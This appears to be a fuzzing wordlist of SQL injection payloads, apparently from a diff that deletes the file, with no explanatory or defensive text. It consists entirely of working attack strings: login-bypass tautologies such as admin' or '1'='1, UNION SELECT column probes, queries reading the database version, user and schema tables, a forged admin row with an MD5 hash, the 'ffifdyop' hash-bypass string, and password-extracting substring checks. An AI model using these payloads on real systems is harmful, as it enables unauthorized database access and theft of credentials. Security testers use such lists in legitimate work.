||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
